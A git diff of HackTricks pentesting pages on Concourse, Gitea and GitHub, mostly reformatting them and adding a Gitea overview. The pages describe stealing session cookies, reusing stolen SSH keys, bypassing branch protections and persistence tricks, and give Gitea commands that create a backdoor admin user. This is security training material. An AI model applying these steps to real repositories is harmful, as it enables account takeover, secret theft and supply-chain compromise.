modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values -* the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails +- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) +- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) +- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) +- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) +- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) +- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel +- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence +- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values +- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step. @@ -112,26 +99,26 @@ Therefore, it's possible to indicate the type of container each step needs to be ```yaml jobs: -- name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - sleep 1000 - echo "$SUPER_SECRET" - params: - SUPER_SECRET: ((super.secret)) + - name: simple + plan: + - task: simple-task + privileged: true + config: + # Tells Concourse which type of worker this task should run on + platform: linux + image_resource: + type: registry-image + source: + repository: busybox # images are pulled from docker hub by default + run: + path: sh + args: + - -cx + - | + sleep 1000 + echo "$SUPER_SECRET" + params: + SUPER_SECRET: ((super.secret)) ``` ```bash @@ -154,24 +141,11 @@ It's possible to **save the results of one task in a file** and indicate that it You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: -* Some time passes: [Time resource](https://github.com/concourse/time-resource/) -* On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) -* New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) -* Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) +- Some time passes: [Time resource](https://github.com/concourse/time-resource/) +- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) +- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) +- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md similarity index 58% rename from pentesting-ci-cd/gitea-security/README.md rename to src/pentesting-ci-cd/gitea-security/README.md index 46eb21749..b1b1842fd 100644 --- a/pentesting-ci-cd/gitea-security/README.md +++ b/src/pentesting-ci-cd/gitea-security/README.md @@ -1,31 +1,18 @@ # Gitea Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## What is Gitea **Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. -![](<../../.gitbook/assets/image (160).png>) +![](<../../images/image (160).png>) ### Basic Information -{% content-ref url="basic-gitea-information.md" %} -[basic-gitea-information.md](basic-gitea-information.md) -{% endcontent-ref %} +{{#ref}} +basic-gitea-information.md +{{#endref}} ## Lab @@ -46,9 +33,9 @@ helm install gitea gitea-charts/gitea ## Unauthenticated Enumeration -* Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) -* Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) -* Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) +- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) +- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) +- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. @@ -62,9 +49,8 @@ If you somehow already have credentials for a user inside an organization (or yo Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. -{% hint style="info" %} -Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. -{% endhint %} +> [!NOTE] +> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. ### With User SSH Key @@ -78,7 +64,7 @@ With this key you can perform **changes in repositories where the user has some git config --list ``` -If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. **SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. @@ -110,12 +96,12 @@ As explained in the basic information, the application will have **full access o In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done: -* **Enable Push**: If anyone with write access can push to the branch, just push to it. -* **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. -* **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it -* **Require approvals is bigger than 0**: Then... you need to compromise another user -* **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list -* **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. +- **Enable Push**: If anyone with write access can push to the branch, just push to it. +- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. +- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it +- **Require approvals is bigger than 0**: Then... you need to compromise another user +- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list +- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. Note that **if you are an org/repo admin** you can bypass the protections. @@ -137,29 +123,16 @@ In this file you can find **keys** and **passwords**. In the gitea path (by default: /data/gitea) you can find also interesting information like: -* The **sqlite** DB: If gitea is not using an external db it will use a sqlite db -* The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). -* The **jwt private key** inside the jwt folder -* More **sensitive information** could be found in this folder +- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db +- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). +- The **jwt private key** inside the jwt folder +- More **sensitive information** could be found in this folder If you are inside the server you can also **use the `gitea` binary** to access/modify information: -* `gitea dump` will dump gitea and generate a .zip file -* `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) -* `gitea admin user change-password --username admin --password newpassword` Change the password -* `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token +- `gitea dump` will dump gitea and generate a .zip file +- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) +- `gitea admin user change-password --username admin --password newpassword` Change the password +- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md new file mode 100644 index 000000000..0fcc1a3f8 --- /dev/null +++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md @@ -0,0 +1,103 @@ +# Basic Gitea Information + +{{#include ../../banners/hacktricks-training.md}} + +## Basic Structure + +The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. + +Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. + +A user may also be **part of different teams** with different permissions over different repos. + +And finally **repositories may have special protection mechanisms**. + +## Permissions + +### Organizations + +When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. + +**Org admins** (owners) can select the **visibility** of the organization: + +- Public +- Limited (logged in users only) +- Private (members only) + +**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. + +When creating a new team, several important settings are selected: + +- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. +- It's also indicated **if members can create new repos** (creator will get admin access to it) +- The **permissions** the **members** of the repo will **have**: + - **Administrator** access + - **Specific** access: + +![](<../../images/image (118).png>) + +### Teams & Users + +In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**: + +- Administrator +- Write +- Read + +## Gitea Authentication + +### Web Access + +Using **username + password** and potentially (and recommended) a 2FA. + +### **SSH Keys** + +You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) + +#### **GPG Keys** + +You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. + +### **Personal Access Tokens** + +You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) + +### Oauth Applications + +Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: + +![](<../../images/image (194).png>) + +### Deploy keys + +Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. + +## Branch Protections + +Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. + +The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ + +> [!NOTE] +> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. + +Different protections can be applied to a branch (like to master): + +- **Disable Push**: No-one can push to this branch +- **Enable Push**: Anyone with access can push, but not force push. +- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) +- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. +- **Enable Status checks:** Require status checks to pass before merging. +- **Require approvals**: Indicate the number of approvals required before a PR can be merged. +- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. +- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) +- **Block merge on official review requests**: If there official review requests it cannot be merged +- **Dismiss stale approvals**: When new commits, old approvals will be dismissed. +- **Require Signed Commits**: Commits must be signed. +- **Block merge if pull request is outdated** +- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes + +> [!NOTE] +> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md similarity index 62% rename from pentesting-ci-cd/github-security/README.md rename to src/pentesting-ci-cd/github-security/README.md index 63f6124cc..dc8fdc948 100644 --- a/pentesting-ci-cd/github-security/README.md +++ b/src/pentesting-ci-cd/github-security/README.md @@ -1,19 +1,6 @@ # Github Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## What is Github @@ -21,17 +8,17 @@ Learn & practice GCP Hacking: [!WARNING] +> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! ### External Forks @@ -71,9 +57,9 @@ It's possible to **compromise repos abusing pull requests**. To know if a repo i Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here: -{% content-ref url="accessible-deleted-data-in-github.md" %} -[accessible-deleted-data-in-github.md](accessible-deleted-data-in-github.md) -{% endcontent-ref %} +{{#ref}} +accessible-deleted-data-in-github.md +{{#endref}} ## Organization Hardening @@ -81,42 +67,41 @@ Even if deleted or internal it might be possible to obtain sensitive data from f There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs). -* **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**. -* **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories. -* **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages. -* **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it. - * _I couldn't find this info in the APIs response, share if you do_ -* **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**. - * _I couldn't find this info in the APIs response, share if you do_ -* **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.** - * _I couldn't find this info in the APIs response, share if you do_ -* **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled. - * _I couldn't find this info in the APIs response, share if you do_ -* **More things can be configured** in this page but the previous are the ones more security related. +- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**. +- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories. +- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages. +- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it. + - _I couldn't find this info in the APIs response, share if you do_ +- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**. + - _I couldn't find this info in the APIs response, share if you do_ +- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.** + - _I couldn't find this info in the APIs response, share if you do_ +- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled. + - _I couldn't find this info in the APIs response, share if you do_ +- **More things can be configured** in this page but the previous are the ones more security related. ### Actions Settings Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`. -{% hint style="info" %} -Note that all this configurations can also be set on each repository independently -{% endhint %} +> [!NOTE] +> Note that all this configurations can also be set on each repository independently -* **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run. - * [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) -* **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators. - * _I couldn't find an API with this info, share if you do_ -* **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository. - * _I couldn't find an API with this info, share if you do_ -* **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB\_TOKEN given to running workflows. - * [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) +- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run. + - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) +- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators. + - _I couldn't find an API with this info, share if you do_ +- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository. + - _I couldn't find an API with this info, share if you do_ +- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows. + - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) ### Integrations _Let me know if you know the API endpoint to access this info!_ -* **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them). -* **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them). +- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them). +- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them). ## Recon & Attacks abusing credentials @@ -128,9 +113,8 @@ If you somehow already have credentials for a user inside an organization you ca Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. -{% hint style="info" %} -Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. -{% endhint %} +> [!NOTE] +> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. @@ -146,7 +130,7 @@ With this key you can perform **changes in repositories where the user has some git config --list ``` -If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. **SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. @@ -190,23 +174,23 @@ Moreover, as explained in the basic information, **organizations can give/deny a There are several techniques to compromise and abuse a Github Action, check them here: -{% content-ref url="abusing-github-actions/" %} -[abusing-github-actions](abusing-github-actions/) -{% endcontent-ref %} +{{#ref}} +abusing-github-actions/ +{{#endref}} ## Branch Protection Bypass -* **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way. - * _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ -* **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. -* **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. - * When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** -* **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. -* **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. -* **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. -* **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). - * If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. +- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way. + - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ +- **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. +- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. + - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** +- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. +- **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. +- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. +- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. +- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). + - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. ## Bypass Environments Protections @@ -217,24 +201,24 @@ In case an environment can be **accessed from all the branches**, it's **isn't p Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**. ```yaml - push: # Run it when a push is made to a branch - branches: - - current_branch_name #Use '**' to run when a push is made to any branch +push: # Run it when a push is made to a branch + branches: + - current_branch_name #Use '**' to run when a push is made to any branch ``` Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets. ## Persistence -* Generate **user token** -* Steal **github tokens** from **secrets** - * **Deletion** of workflow **results** and **branches** -* Give **more permissions to all the org** -* Create **webhooks** to exfiltrate information -* Invite **outside collaborators** -* **Remove** **webhooks** used by the **SIEM** -* Create/modify **Github Action** with a **backdoor** -* Find **vulnerable Github Action to command injection** via **secret** value modification +- Generate **user token** +- Steal **github tokens** from **secrets** + - **Deletion** of workflow **results** and **branches** +- Give **more permissions to all the org** +- Create **webhooks** to exfiltrate information +- Invite **outside collaborators** +- **Remove** **webhooks** used by the **SIEM** +- Create/modify **Github Action** with a **backdoor** +- Find **vulnerable Github Action to command injection** via **secret** value modification ### Imposter Commits - Backdoor via repo commits @@ -246,28 +230,15 @@ Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1eb name: example on: [push] jobs: - commit: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e - - shell: bash - run: | - echo 'hello world!' + commit: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e + - shell: bash + run: | + echo 'hello world!' ``` For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md similarity index 65% rename from pentesting-ci-cd/github-security/abusing-github-actions/README.md rename to src/pentesting-ci-cd/github-security/abusing-github-actions/README.md index f6d755b44..a9f7633d1 100644 --- a/pentesting-ci-cd/github-security/abusing-github-actions/README.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md @@ -1,31 +1,18 @@ # Abusing Github Actions -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information In this page you will find: -* A **summary of all the impacts** of an attacker managing to access a Github Action -* Different ways to **get access to an action**: - * Having **permissions** to create the action - * Abusing **pull request** related triggers - * Abusing **other external access** techniques - * **Pivoting** from an already compromised repo -* Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts) +- A **summary of all the impacts** of an attacker managing to access a Github Action +- Different ways to **get access to an action**: + - Having **permissions** to create the action + - Abusing **pull request** related triggers + - Abusing **other external access** techniques + - **Pivoting** from an already compromised repo +- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts) ## Impacts Summary @@ -33,45 +20,46 @@ For an introduction about [**Github Actions check the basic information**](../ba If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to: -* **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP. -* **Compromise deployments** and other **artifacts**. - * If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack. -* **Execute code in custom workers** to abuse computing power and pivot to other systems. -* **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`. +- **Steal secrets** mounted to the pipeline and **abuse the pipeline's 